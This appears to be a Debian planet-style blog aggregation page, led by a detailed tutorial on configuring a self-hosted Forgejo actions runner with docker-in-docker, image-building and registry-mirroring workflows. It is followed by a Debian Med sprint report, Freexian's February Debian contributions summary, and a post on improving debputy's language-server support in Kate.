
17 March 2025

Sergio Talens-Oliag: Configuring forgejo actions

Last week I decided I wanted to try out forgejo actions to build this blog instead of using webhooks, so I read the documentation and started playing with it until I had it working as I wanted. This post describes how I've installed and configured a forgejo runner, how I've added an oci organization to my instance to build, publish and mirror container images, and how I've added a couple of additional organizations (actions and docker for now) to mirror interesting actions. The changes made to build the site using actions will be documented in a separate post, as I'll be using this entry to test the new setup on the blog project.

Installing the runner

The first thing I've done is to install a runner on my server. I decided to use the OCI image installation method, as it seemed to be the easiest and fastest one. The commands I've used to set up the runner are the following:
$ cd /srv
$ git clone https://forgejo.mixinet.net/blogops/forgejo-runner.git
$ cd forgejo-runner
$ sh ./bin/setup-runner.sh
The setup-runner.sh script does multiple things (a sketch follows the list):
  • create a forgejo-runner user and group
  • create the necessary directories for the runner
  • create a .runner file with a predefined secret and the docker label
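A minimal sketch of the idea, assuming the directory layout used above and that the forgejo-runner binary provides the create-runner-file subcommand for offline registration (the real script linked below is authoritative):
#!/bin/sh
# Sketch only: names, paths and flags are assumptions.
RUNNER_NAME="forgejo-runner"
FORGEJO_URL="https://forgejo.mixinet.net"
FORGEJO_SECRET="${FORGEJO_SECRET:?export FORGEJO_SECRET first}"
# Create the user and group the runner container will run as
groupadd "$RUNNER_NAME"
useradd -g "$RUNNER_NAME" -M -s /usr/sbin/nologin "$RUNNER_NAME"
# Create the directories shared with the containers
mkdir -p data dind
# Pre-generate the .runner file with the fixed secret; the docker label
# can then be adjusted in the generated file.
forgejo-runner create-runner-file --instance "$FORGEJO_URL" --secret "$FORGEJO_SECRET"
mv .runner data/.runner
chown -R "$RUNNER_NAME:$RUNNER_NAME" data dind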
The setup-runner.sh code is available here. After running the script the runner has to be registered with the forgejo server, which can be done using the following command:
$ forgejo forgejo-cli actions register --name "$RUNNER_NAME" \
    --secret "$FORGEJO_SECRET"
The RUNNER_NAME variable is defined in the setup-runner.sh script and the FORGEJO_SECRET must match the value used in the .runner file.
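The secret is expected to be a string of 40 hexadecimal characters (an assumption about the format Forgejo accepts for offline registration); a suitable value can be generated with:
$ openssl rand -hex 20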

Starting it with docker-compose

To launch the runner I'm going to use a docker-compose.yml file that starts two containers: a docker-in-docker (dind) service to run the containers used by the workflow jobs, and another one that runs the forgejo-runner itself. The initial version used a TCP port to communicate with the dockerd server from the runner, but when I tried to build images from a workflow I noticed that the containers launched by the runner would not be able to execute another dockerd inside the dind one and, even if they could, it would be computationally expensive. To avoid the issue I modified the dind service to use a unix socket on a shared volume that can be used by the runner service to communicate with the daemon, and that is also re-shared with the job containers so the dockerd server can be used from them to build images.
Warning: Using the same docker server for the runner and the jobs it launches has security implications, but this instance is for a home server where I am the only user, so I am not worried about it and this way I can save some resources (in fact, I could use the host docker server directly instead of a dind service, but in case I want to run other containers on the host I prefer to keep the one used for the runner isolated from it). For those concerned about sharing the same server, an alternative would be to launch a second dockerd only for the jobs (i.e. actions-dind) using the same approach (the volume with its socket would have to be shared with the runner service so it can be re-shared, but the runner does not need to use it).
The final docker-compose.yml file is as follows:
services:
  dind:
    image: docker:dind
    container_name: 'dind'
    privileged: 'true'
    command: ['dockerd', '-H', 'unix:///dind/docker.sock', '-G', '$RUNNER_GID']
    restart: 'unless-stopped'
    volumes:
      - ./dind:/dind
  runner:
    image: 'data.forgejo.org/forgejo/runner:6.2.2'
    links:
      - dind
    depends_on:
      dind:
        condition: service_started
    container_name: 'runner'
    environment:
      DOCKER_HOST: 'unix:///dind/docker.sock'
    user: $RUNNER_UID:$RUNNER_GID
    volumes:
      - ./config.yaml:/config.yaml
      - ./data:/data
      - ./dind:/dind
    restart: 'unless-stopped'
    command: '/bin/sh -c "sleep 5; forgejo-runner daemon -c /config.yaml"'
There are multiple things to note about this file:
  1. The dockerd server is started with the -H unix:///dind/docker.sock flag to use the unix socket to communicate with the daemon instead of using a TCP port (as said, it is faster and allows us to share the socket with the containers started by the runner).
  2. We are running the dockerd daemon with the RUNNER_GID group so the runner can communicate with it (the socket gets that group, which is the same one used by the runner; see the check after this list).
  3. The runner container mounts three volumes: the data directory, the dind folder where docker creates the unix socket and a config.yaml file used by us to change the default runner configuration.
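Once both containers are up, a quick sanity check is to confirm that the socket has the runner's group and that the daemon answers through it (paths assume the /srv/forgejo-runner checkout used above, and that a docker client is installed on the host):
$ ls -ln dind/docker.sock
$ sudo -u forgejo-runner docker -H unix:///srv/forgejo-runner/dind/docker.sock version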
The config.yaml file was originally generated using the forgejo-runner itself:
$ docker run --rm data.forgejo.org/forgejo/runner:6.2.2 \
    forgejo-runner generate-config > config.yaml
The changes to it are minimal: the runner capacity has been increased to 2 (which allows it to run two jobs at the same time) and the /dind/docker.sock value has been added to the valid_volumes key to allow the containers launched by the runner to mount it when needed. The diff against the default version is as follows:
@@ -13,7 +13,8 @@
   # Where to store the registration result.
   file: .runner
   # Execute how many tasks concurrently at the same time.
-  capacity: 1
+  # STO: Allow 2 concurrent tasks
+  capacity: 2
   # Extra environment variables to run jobs.
   envs:
     A_TEST_ENV_NAME_1: a_test_env_value_1
@@ -87,7 +88,9 @@
   # If you want to allow any volume, please use the following configuration:
   # valid_volumes:
   #   - '**'
-  valid_volumes: []
+  # STO: Allow to mount the /dind/docker.sock on the containers
+  valid_volumes:
+    - /dind/docker.sock
   # overrides the docker client host with the specified one.
   # If "-" or "", an available docker host will automatically be found.
   # If "automount", an available docker host will automatically be found and ...
To start the runner we export the RUNNER_UID and RUNNER_GID variables and call docker compose up to start the containers in the background:
$ RUNNER_UID="$(id -u forgejo-runner)" RUNNER_GID="$(id -g forgejo-runner)" \
    docker compose up -d
If the server was configured correctly, we are now able to start using actions with this runner.
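A simple way to verify the whole chain is to push a trivial workflow to any repository on the instance; a minimal sketch (the file name is arbitrary, and runs-on: docker matches the label defined for our runner):
.forgejo/workflows/test.yaml
name: test
on: [push]
jobs:
  test:
    runs-on: docker
    steps:
      - run: echo "Hello from the forgejo runner"
If the job appears on the repository's actions tab and prints the message, the runner is working.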

Preparing the system to run things locally

To avoid unnecessary network traffic we are going to create multiple organizations in our forgejo instance to maintain our own actions and container images and to mirror remote ones. The rationale behind the mirrors is that they greatly reduce the need to connect to remote servers to download actions and images, which is good for performance and security reasons. In fact, we are going to build our own images for some things, to install the tools we want without needing to do it over and over again in the workflow jobs.

Mirrored actions

The mirrored actions live in the actions and docker organizations; we have created the following ones for now (the mirrors were created using the forgejo web interface and we have manually disabled all the forgejo modules except the code one for them):
To use our actions by default (i.e., without needing to add the server URL to the uses keyword) we have added the following section to the app.ini file of our forgejo server:
[actions]
ENABLED = true
DEFAULT_ACTIONS_URL = https://forgejo.mixinet.net
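With that setting in place, a bare uses: reference in a workflow resolves against our instance instead of the default one; for example (assuming the actions/checkout mirror described above):
      - uses: actions/checkout@v4  # fetched from https://forgejo.mixinet.net/actions/checkout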

Setting up credentials to push images

To be able to push images to the oci organization I've created a token with package:write permission for my own user, because I'm a member of the organization and authorized to publish packages on it (a different user could be created, but as I said this is for personal use, so there is no need to complicate things for now). To allow the use of those credentials in the actions I have added a secret (REGISTRY_PASS) and a variable (REGISTRY_USER) to the oci organization. I've also logged in with my local docker client to be able to push images to the oci group by hand, as that is needed for bootstrapping the system (as I'm using local images in the workflows I need to push them to the server before running the ones that are used to build the images).

Local and mirrored images

Our images will be stored in the packages section of a new organization called oci; inside it we have created two projects that use forgejo actions to keep things in shape:
  • images: contains the source files used to generate our own images and the actions to build, tag and push them to the oci organization group.
  • mirrors: contains a configuration file for the regsync tool to mirror containers and an action to run it.
In the next sections we describe the actions and images we have created and mirrored from those projects.

The oci/images project

The images project is a monorepo that contains the source files for the images we are going to build and a couple of actions. The image sources live in subdirectories of the repository; to be considered an image, a folder has to contain a Dockerfile that will be used to build it. The repository has two workflows:
  • build-image-from-tag: Workflow to build, tag and push an image to the oci organization
  • multi-semantic-release: Workflow to create tags for the images using the multi-semantic-release tool.
As the workflows are already configured to use some of our images, we pushed some of them from a checkout of the repository using the following commands:
registry="forgejo.mixinet.net/oci"
for img in alpine-mixinet node-mixinet multi-semantic-release; do
  docker build -t $registry/$img:1.0.0 $img
  docker tag $registry/$img:1.0.0 $registry/$img:latest
  docker push $registry/$img:1.0.0
  docker push $registry/$img:latest
done
In the next subsections we will describe what the workflows do and show their source code.

build-image-from-tag workflow

This workflow uses a docker client to build an image from a tag on the repository with the format image-name-v[0-9]+.[0-9]+.[0-9]+. As the runner is executed in a container (instead of using lxc) it seemed unreasonable to run another dind container from it; that is why, after some tests, I decided to share the dind service's socket with the runner container and enabled the option to mount it also on the containers launched by the runner when needed (I only do it on the build-image-from-tag workflow for now). The workflow was configured to run using a trigger or when new tags with the right format were created, but when the tag is created by multi-semantic-release the trigger does not fire for some reason, so now it only runs on triggers and checks if it was launched for a tag with the right format on the job itself. The source code of the workflow is as follows:
name: build-image-from-tag
on:
  workflow_dispatch:
jobs:
  build:
    # Don't build the image if the registry credentials are not set, the ref is not a tag or it doesn't contain '-v'
    if: ${{ vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != '' && startsWith(github.ref, 'refs/tags/') && contains(github.ref, '-v') }}
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
      # Mount the dind socket on the container at the default location
      options: -v /dind/docker.sock:/var/run/docker.sock
    steps:
      - name: Extract image name and tag from git and get registry name from env
        id: job_data
        run: |
          echo "::set-output name=img_name::${GITHUB_REF_NAME%%-v*}"
          echo "::set-output name=img_tag::${GITHUB_REF_NAME##*-v}"
          echo "::set-output name=registry::$(
            echo "${{ github.server_url }}" | sed -e 's%https://%%'
          )"
          echo "::set-output name=oci_registry_prefix::$(
            echo "${{ github.server_url }}/oci" | sed -e 's%https://%%'
          )"
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Export build dir and Dockerfile
        id: build_data
        run: |
          img="${{ steps.job_data.outputs.img_name }}"
          build_dir="$(pwd)/${img}"
          dockerfile="${build_dir}/Dockerfile"
          if [ -f "$dockerfile" ]; then
            echo "::set-output name=build_dir::$build_dir"
            echo "::set-output name=dockerfile::$dockerfile"
          else
            echo "Couldn't find the Dockerfile for the '$img' image"
            exit 1
          fi
      - name: Login to the Container Registry
        uses: docker/login-action@v3
        with:
          registry: ${{ steps.job_data.outputs.registry }}
          username: ${{ vars.REGISTRY_USER }}
          password: ${{ secrets.REGISTRY_PASS }}
      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v3
      - name: Build and Push
        uses: docker/build-push-action@v6
        with:
          push: true
          tags: |
            ${{ steps.job_data.outputs.oci_registry_prefix }}/${{ steps.job_data.outputs.img_name }}:${{ steps.job_data.outputs.img_tag }}
            ${{ steps.job_data.outputs.oci_registry_prefix }}/${{ steps.job_data.outputs.img_name }}:latest
          context: ${{ steps.build_data.outputs.build_dir }}
          file: ${{ steps.build_data.outputs.dockerfile }}
          build-args: |
            OCI_REGISTRY_PREFIX=${{ steps.job_data.outputs.oci_registry_prefix }}/
Some notes about this code:
  1. The if condition of the build job is not perfect, but it is good enough to avoid wrong uses as long as nobody uses manual tags with the wrong format and expects things to work (it checks if the REGISTRY_USER and REGISTRY_PASS variables are set, if the ref is a tag and if it contains the -v string).
  2. To be able to access the dind socket we mount it on the container using the options key on the container section of the job (this only works if supported by the runner configuration as explained before).
  3. We use the job_data step to get information about the image from the tag and the registry URL from the environment variables; it is executed first because all that information is available without checking out the repository.
  4. We use the build_data step to get the build dir and Dockerfile paths from the repository (right now we are assuming fixed paths and checking that the Dockerfile exists, but in the future we could use a configuration file to get them, if needed).
  5. As we are using a docker daemon that is already running there is no need to use the docker/setup-docker-action to install it.
  6. On the build and push step we pass the OCI_REGISTRY_PREFIX build argument to the Dockerfile to be able to use it in the FROM instruction (we are using it in our images; see the sketch below).
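For context, the top of one of those Dockerfiles might look like this (a sketch; an ARG before FROM is what lets the build argument reach the FROM instruction, but the exact image contents are assumptions):
ARG OCI_REGISTRY_PREFIX
FROM ${OCI_REGISTRY_PREFIX}alpine-mixinet:latest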

multi-semantic-release workflow

This workflow is used to run the multi-semantic-release tool on pushes to the main branch. It is configured to create the configuration files on the fly (it prepares things to tag the folders that contain a Dockerfile using a couple of template files available in the repository's .forgejo directory) and to run the multi-semantic-release tool to create tags and push them to the repository if new versions are to be built. Initially we assumed that the tag creation pushed by multi-semantic-release would be enough to run the build-image-from-tag workflow, but as it didn't work we removed the rule to run that workflow on tag creation and added code to trigger it using an API call for the newly created tags (we get them from the output of the multi-semantic-release execution). The source code of the workflow is as follows:
name: multi-semantic-release
on:
  push:
    branches:
      - 'main'
jobs:
  multi-semantic-release:
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/multi-semantic-release:latest
    steps:
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Generate multi-semantic-release configuration
        shell: sh
        run: |
          # Get the list of images to work with (the folders that have a Dockerfile)
          images="$(for img in */Dockerfile; do dirname "$img"; done)"
          # Generate a values.yaml file for the main packages.json file
          package_json_values_yaml=".package.json-values.yaml"
          echo "images:" >"$package_json_values_yaml"
          for img in $images; do
            echo " - $img" >>"$package_json_values_yaml"
          done
          echo "::group::Generated values.yaml for the project"
          cat "$package_json_values_yaml"
          echo "::endgroup::"
          # Generate the package.json file, validating that it is a good json file with jq
          tmpl -f "$package_json_values_yaml" ".forgejo/package.json.tmpl" | jq . > "package.json"
          echo "::group::Generated package.json for the project"
          cat "package.json"
          echo "::endgroup::"
          # Remove the temporary values file
          rm -f "$package_json_values_yaml"
          # Generate the package.json file for each image
          for img in $images; do
            tmpl -v "img_name=$img" -v "img_path=$img" ".forgejo/ws-package.json.tmpl" | jq . > "$img/package.json"
            echo "::group::Generated package.json for the '$img' image"
            cat "$img/package.json"
            echo "::endgroup::"
          done
      - name: Run multi-semantic-release
        shell: sh
        run: |
          multi-semantic-release | tee .multi-semantic-release.log
      - name: Trigger builds
        shell: sh
        run: |
          # Get the list of tags published on the previous steps
          tags="$(
            sed -n -e 's/^\[.*\] \[\(.*\)\] .* Published release \([0-9]\+\.[0-9]\+\.[0-9]\+\) on .*$/\1-v\2/p' \
              .multi-semantic-release.log
          )"
          rm -f .multi-semantic-release.log
          if [ "$tags" ]; then
            # Prepare the url for building the images
            workflow="build-image-from-tag.yaml"
            dispatch_url="${{ github.api_url }}/repos/${{ github.repository }}/actions/workflows/$workflow/dispatches"
            echo "$tags" | while read -r tag; do
              echo "Triggering build for tag '$tag'"
              curl \
                -H "Content-Type:application/json" \
                -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
                -d "{\"ref\":\"$tag\"}" "$dispatch_url"
            done
          fi
Notes about this code:
  1. The use of the tmpl tool to process the multi-semantic-release configuration templates comes from previous uses; in this case we could have used a different approach (e.g. envsubst), but we left it because it keeps things simple and can be useful in the future if we want to do more complex things with the template files.
  2. We use tee to show and dump to a file the output of the multi-semantic-release execution.
  3. We get the list of pushed tags using sed against the output of the multi-semantic-release execution, and for each one found we use curl to call the forgejo API to trigger the build workflow; as the call is against the same project we can use the GITHUB_TOKEN generated for the workflow, without creating a user token that has to be shared as a secret. An example of what the sed extraction does is shown below.
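Assuming a published-release log line of roughly this shape (the exact format of the multi-semantic-release output is an assumption here), the sed expression turns it into a tag name:
$ echo '[12:34:56] [alpine-mixinet] > Published release 1.0.1 on default channel.' | \
    sed -n -e 's/^\[.*\] \[\(.*\)\] .* Published release \([0-9]\+\.[0-9]\+\.[0-9]\+\) on .*$/\1-v\2/p'
alpine-mixinet-v1.0.1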
The .forgejo/package.json.tmpl file is the following one:
{
  "name": "multi-semantic-release",
  "version": "0.0.0-semantically-released",
  "private": true,
  "multi-release": {
    "tagFormat": "${name}-v${version}"
  },
  "workspaces": {{ .images | toJson }}
}
As can be seen, it only needs a list of paths to the images as argument (the file we generate contains the names and paths, but it could be simplified).
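For the three images pushed earlier, the rendered package.json would look something like this (an illustration, not a file from the repository):
{
  "name": "multi-semantic-release",
  "version": "0.0.0-semantically-released",
  "private": true,
  "multi-release": {
    "tagFormat": "${name}-v${version}"
  },
  "workspaces": ["alpine-mixinet", "node-mixinet", "multi-semantic-release"]
}
And the .forgejo/ws-package.json.tmpl file is the following one: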
{
  "name": "{{ .img_name }}",
  "license": "UNLICENSED",
  "release": {
    "plugins": [
      [
        "@semantic-release/commit-analyzer",
        {
          "preset": "conventionalcommits",
          "releaseRules": [
            { "breaking": true, "release": "major" },
            { "revert": true, "release": "patch" },
            { "type": "feat", "release": "minor" },
            { "type": "fix", "release": "patch" },
            { "type": "perf", "release": "patch" }
          ]
        }
      ],
      [
        "semantic-release-replace-plugin",
        {
          "replacements": [
            {
              "files": [ "{{ .img_path }}/msr.yaml" ],
              "from": "^version:.*$",
              "to": "version: ${nextRelease.version}",
              "allowEmptyPaths": true
            }
          ]
        }
      ],
      [
        "@semantic-release/git",
        {
          "assets": [ "msr.yaml" ],
          "message": "ci(release): {{ .img_name }}-v${nextRelease.version}\n\n${nextRelease.notes}"
        }
      ]
    ],
    "branches": [ "main" ]
  }
}

The oci/mirrors project

The repository contains a template for the configuration file we are going to use with regsync (regsync.envsubst.yml) to mirror images from remote registries, plus a workflow that generates a configuration file from the template and runs the tool. The initial version of the regsync.envsubst.yml file is prepared to mirror alpine containers from version 3.21 to 3.29 (we explicitly exclude version 3.20) and needs the forgejo.mixinet.net/oci/node-mixinet:latest image to run (as explained before, it was pushed manually to the server):
version: 1
creds:
  - registry: "$REGISTRY"
    user: "$REGISTRY_USER"
    pass: "$REGISTRY_PASS"
sync:
  - source: alpine
    target: $REGISTRY/oci/alpine
    type: repository
    tags:
      allow:
        - "latest"
        - "3\\.2\\d+"
        - "3\\.2\\d+.\\d+"
      deny:
        - "3\\.20"
        - "3\\.20.\\d+"

mirror workflow

The mirror workflow creates a configuration file by replacing the value of the REGISTRY environment variable (computed by removing the protocol from the server_url), the REGISTRY_USER organization variable and the REGISTRY_PASS secret using the envsubst command, and then runs the regsync tool to mirror the images using that configuration file. The workflow is configured to run daily, on push events when the regsync.envsubst.yml file is modified on the main branch, and it can also be triggered manually. The source code of the workflow is as follows:
.forgejo/workflows/mirror.yaml
name: mirror
on:
  schedule:
    - cron: '@daily'
  push:
    branches:
      - main
    paths:
      - 'regsync.envsubst.yml'
  workflow_dispatch:
jobs:
  mirror:
    if: ${{ vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != '' }}
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Sync images
        run: |
          REGISTRY="$(echo "${{ github.server_url }}" | sed -e 's%https://%%')" \
          REGISTRY_USER="${{ vars.REGISTRY_USER }}" \
          REGISTRY_PASS="${{ secrets.REGISTRY_PASS }}" \
            envsubst <regsync.envsubst.yml >.regsync.yml
          regsync --config .regsync.yml once
          rm -f .regsync.yml

Conclusion

We have installed a forgejo-runner and configured it to run actions for our own server, and things are working fine. This approach gives us a powerful CI/CD system on a modest home server, something very useful for maintaining personal projects and playing with things without needing SaaS platforms like github or gitlab.

15 March 2025

Bits from Debian: Debian Med Sprint in Berlin

Debian Med sprint in Berlin on 15 and 16 February
The Debian Med team works on software packages that are associated with medicine, pre-clinical research, and life sciences, and makes them available for the Debian distribution. Seven Debian developers and contributors to the team gathered for their annual Sprint in Berlin, Germany on 15 and 16 February 2025. The purpose of the meeting was to tackle bugs in Debian-Med packages, enhance the quality of the team's packages, and coordinate the efforts of team members overall. This sprint allowed participants to fix dozens of bugs, including release-critical ones. New upstream versions were uploaded, and the participants took some time to modernize some packages. Additionally, they discussed the long-term goals of the team, prepared a forthcoming invited talk for a conference, and enjoyed working together. More details on the event and individual agendas/reports can be found at https://wiki.debian.org/Sprints/2025/DebianMed.

11 March 2025

Freexian Collaborators: Debian Contributions: Debian.Social administration, DebConf 25 preparations, Fixing Time-based test failure in Python requests package and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-02 Contributing to Debian is part of Freexian's mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Debian.Social administration, by Stefano Rivera
Over the last year, the Debian.social services outgrew the infrastructure that was supporting them. The matrix bridge in particular was hosted on a cloud instance backed by a large, expensive storage volume. Debian.CH rented a new large physical server to host all these instances earlier this year. Stefano set up Incus on the new physical machine and migrated all the old debian.social LXC containers, libvirt VMs, and cloud instances into Incus-managed LXC containers. Stefano set up Prometheus monitoring and alerts for the new infrastructure and a Grafana dashboard. The current stack of debian.social services seems to fit comfortably on the new machine, with good room to grow.

DebConf 25, by Santiago Ruano Rincón and Stefano Rivera
DebConf 25 preparations continue. The team is currently finalizing a budget. Stefano helped to review the current budget proposals and suggest approaches for balancing it. Stefano installed a Zammad instance to organize queries from attendees for the registration and visa teams. Santiago continued discussions with possible caterers so we can have options for the different diet requirements that could also fit into the DebConf budget. In collaboration with Anupa, Santiago also pushed the first draft changes to document the venue information on the DebConf 25 website and how to get to Brest.

Time-based test failure in requests, by Colin Watson
Colin fixed a fun bug in the Python requests package. Santiago Vila has been running tests of what happens when Debian packages are built on a system in which time has been artificially set to somewhere around the end of the support period for the next Debian release, in order to make it easier to do things like issuing security updates for the lifetime of that release. In this case, the failure indicated an expired test certificate, and since the repository already helpfully included scripts to regenerate those certificates, it seemed natural to try regenerating them just before running tests. However, this failed for more obscure reasons and Colin spent some time investigating. This turned out to be because the test CA was missing the CA constraint, and so recent versions of OpenSSL reject it; Colin sent a pull request to fix this.

Priority list for outdated packages, by Santiago Ruano Rincón
Santiago started a discussion on debian-devel about packages that have a history of security issues and that are outdated with regard to new upstream releases. The goal of the effort is to have a prioritized list of packages needing some work, from a security point of view. Moreover, the aim of publicly sharing the list with the Debian Developers community is to make it easier to look at the packages maintained by teams, or even other maintainers, where help could be welcome. Santiago is planning to take into account the feedback provided on debian-devel and to propose tooling that could help to regularly bring collective awareness of these packages.

Miscellaneous contributions
  • Carles worked on English to Catalan po-debconf translations: reviewed translations, created merge requests and followed up with developers for more than 30 packages using po-debconf-manager.
  • Carles helped users, fixed bugs and implemented downloading updated templates on po-debconf-manager.
  • Carles packaged a new upstream version of python-pyaarlo.
  • Carles improved reproducibility of qnetload (now reported as reproducible) and simplemonitor (followed up with upstream and pending update of Debian package).
  • Carles collaborated with debian-history package: fixed FTBFS from master branch, enabled salsa-ci and investigated reproducibility.
  • Emilio improved support for automatically marking CVEs as NOT-FOR-US in the security-tracker, closing #1073012.
  • Emilio updated xorg-server and xwayland in unstable, fixing the last round of security vulnerabilities.
  • Stefano prepared a few PyPy and cPython uploads, and started the python3.13-only transition.
  • Helmut Grohne sent patches for 24 cross build failures.
  • Helmut fixed two problems in the Debian /usr-merge analysis tool. In one instance, it would overmatch Debian bugs to issues and in another it would fail to recognize Pre-Depends as a conflict mechanism.
  • Helmut attempted to make rebootstrap work for gcc-15, with limited success as very many packages FTBFS with gcc-15 due to using function declarations without arguments.
  • Helmut provided a change to the security-tracker that would pre-compute /data/json during database updates rather than on demand resulting in a reduced response time.
  • Colin uploaded OpenSSH security updates for testing/unstable, bookworm, bullseye, buster, and stretch.
  • Colin fixed upstream monitoring for 26 Python packages, and upgraded 54 packages (mostly Python-related, but also PuTTY) to new upstream versions.
  • Colin updated python-django in bookworm-backports to 4.2.18 (issuing BSA-121), and added new backports of python-django-dynamic-fixture and python-django-pgtrigger, all of which are dependencies of debusine.
  • Thorsten Alteholz finally managed to upload hplip to fix two release-critical and some normal bugs. The next step in March will be to upload the latest version of hplip.
  • Faidon updated crun in unstable & trixie, resolving a long-standing request to enable criu support and thus enabling podman with checkpoint/restore functionality (with gratitude to Salvatore Bonaccorso and Reinhard Tartler for the cooperation and collaboration).
  • Faidon uploaded a number of packages (librdkafka, libmaxminddb, python-maxminddb, lowdown, tox, tox-uv, pyproject-api, xiccd and gdnsd) bringing them up to date with new upstream releases, resolving various bugs.
  • Lucas Kanashiro uploaded some ruby packages involved in the Rails 7 transition with new upstream releases.
  • Lucas triaged a ruby3.1 bug (#1092595) and prepared a fix for the next stable release update.
  • Lucas set up the needed wiki pages and updated the Debian Project status in the Outreachy portal, in order to send out a call for projects and mentors for the next round of Outreachy.
  • Anupa joined Santiago to prepare a list of companies to contact via LinkedIn for DebConf 25 sponsorship.
  • Anupa printed Debian stickers and sponsorship brochures and flyers for DebConf 25, to be distributed at the FOSS ASIA summit 2025.
  • Anupa participated in the Debian publicity team meeting and discussed the upcoming events and tasks.
  • Raphaël packaged zim 0.76.1 and integrated an upstream patch for another regression that he reported.
  • Raphaël worked with the Debian System Administrators for tracker.debian.org to better cope with gmail's requirement for mails to be authenticated.

9 March 2025

Niels Thykier: Improving Debian packaging in Kate

The other day, I noted that the emacs integration with debputy stopped working. After debugging for a while, I realized that emacs no longer sent the didOpen notification that is expected of it, which confused debputy. At this point, I was already several hours into the debugging and I noted there were some discussions on debian-devel about emacs and byte compilation not working. So I figured I would shelve the emacs problem for now. But I needed an LSP-capable editor and, with my vi skills leaving much to be desired, I skipped out on vim-youcompleteme. Instead, I pulled out kate, which I had not been using for years. It had LSP support, so it would be fine, right? Well, no. Turns out that debputy's LSP support had some assumptions that worked for emacs but not kate. Plus once you start down the rabbit hole, you stumble on things you missed previously.
Getting started

First order of business was to tell kate about debputy. Conveniently, kate has a configuration tab for adding language servers in a JSON format, right next to the tab where you can see its configuration for built-in LSP servers (also in JSON format). So a quick bit of copy-paste magic and that was done. Yesterday, I opened an MR against upstream to have the configuration added (https://invent.kde.org/utilities/kate/-/merge_requests/1748) and they already merged it. Today, I then filed a wishlist bug against kate in Debian to have the Debian maintainers cherry-pick it, so it works out of the box for Trixie (https://bugs.debian.org/1099876). So far so good.
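For reference, a user-added entry in kate's LSP client settings is JSON of roughly this shape (the language key, URL and highlighting regex here are illustrative assumptions; the merged upstream configuration is the authoritative version):
{
  "servers": {
    "debian-control": {
      "command": ["debputy", "lsp", "server"],
      "url": "https://salsa.debian.org/debian/debputy",
      "highlightingModeRegex": "^Debian Control$"
    }
  }
}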
Inlay hint woes

Since July (2024), debputy has had support for Inlay hints. They are basically small bits of text that the LSP server can ask the editor to inject into the text to provide hints to the reader. Typically, you see them used to provide typing hints, where the editor or the underlying LSP server has figured out the type of a variable or expression that you did not explicitly type. Another common use case is to inject the parameter name for positional arguments when calling a function, so the user does not have to count the position to figure out which value is passed as which parameter. In debputy, I have been using the Inlay hints to show inherited fields in debian/control. As an example, if you have a definition like:
Source: foo-src
Section: devel
Priority: optional
Package: foo-bin
Architecture: any
Then foo-bin inherits the Section and Priority fields since it does not supply its own. Previously, debputy would show that by injecting the fields themselves and their values just below the Package field, as if you had typed them out directly. The editor always renders Inlay hints distinctly from regular text, so there was no risk of confusion and it made the text look like a valid debian/control file end to end. The result looked something like:
Source: foo-src
Section: devel
Priority: optional
Package: foo-bin
Section: devel
Priority: optional
Architecture: any
With the second instances of Section and Priority being rendered differently than their surroundings (usually faded or colorless). Unfortunately, kate did not like injecting Inlay hints with a newline in them, which was needed for this trick. Reading the LSP specs, they say nothing about multi-line Inlay hints being a thing, and I figured I would see this problem again with other editors if I left it be. I ended up changing the Inlay hints to be placed at the end of the Package field, wrapped in () for better visuals. So now, it looks like:
Source: foo-src
Section: devel
Priority: optional
Package: foo-bin  (Section: devel)  (Priority: optional)
Architecture: any
Unfortunately, it is no longer 1:1 with the underlying syntax, which is what I liked about the previous rendering. But it works in more editors and is still explicit. I also removed the Inlay hint for the Homepage field. It takes too much space and I have yet to meet someone missing it in the binary stanza. If you have any better ideas for how to render it, feel free to reach out to me.
Spurious completion and hover

As I was debugging the Inlay hints, I wanted to do a quick restart of debputy after each fix. Then I would trigger a small change to the document to ensure kate would request an update from debputy to render the Inlay hints with the new code. The full outgoing payloads are sent via the logs to the client, so it was really about minimizing which LSP requests were sent to debputy. Notably, two cases would flood the log:
  • Completion requests. These are triggered by typing anything at all, and since I wanted to make a change, I could not avoid this. So here it was about making sure there would be nothing to complete, so the result was as small as possible.
  • Hover doc requests. These are triggered by hovering the mouse over a field, so this was mostly about ensuring my mouse movement did not linger over any field on the way between restarting the LSP server and scrolling the log in kate.
In my infinite wisdom, I chose to make a comment line where I would do the change. I figured it would neuter the completion requests completely and it should not matter if my cursor landed on the comment, as there would be no hover docs for comments either. Unfortunately for me, debputy would ignore the fact that it was on a comment line. Instead, it would find the next field after the comment line and try to complete based on that. Normally you do not see this, because the editor correctly identifies that none of the completion suggestions start with a #, so they are all discarded. But it was pretty annoying for the debugging, so now debputy has been told to explicitly stop these requests early on comment lines.
Hover docs for packages

I added a feature in debputy where you can hover over package names in your relationship fields (such as Depends) and debputy will render a small snippet about the package based on data from your local APT cache. This doc is then handed to the editor and tagged as markdown, provided the editor supports markdown rendering. Both emacs and kate support markdown. However, not all markdown renderings are equal. Notably, emacs's rendering does not reformat the text into paragraphs. In a sense, emacs's rendering works a bit like <pre>...</pre> except it does a bit of fancy rendering inside the <pre>...</pre>. On the other hand, kate seems to convert the markdown to HTML and then throw the result into an HTML render engine. Here it is important to remember that not all newlines are equal in markdown. A Foo<newline>Bar is treated as one "paragraph" (<p>...</p>), and the HTML renderer happily renders this as the single line Foo Bar provided there is sufficient width to do so. A couple of extra newlines made wonders for the kate rendering, but I have a feeling this is not going to be the last time the hover docs need some tweaking for prettification. Feel free to reach out if you spot a weirdly rendered hover doc somewhere.
Making quickfixes available in kate

Quickfixes are treated as generic code actions in the LSP specs. Each code action has a "type" (kind in the LSP lingo), which enables the editor to group the actions accordingly or filter by certain types of code actions. The design in the specs leads to the following flow:
  1. The LSP server provides the editor with diagnostics (there are multiple ways to trigger this, so we will keep this part simple).
  2. The editor renders them to the user and the user chooses to interact with one of them.
  3. The interaction makes the editor ask the LSP server which code actions are available at that location (optionally with a filter to only see quickfixes).
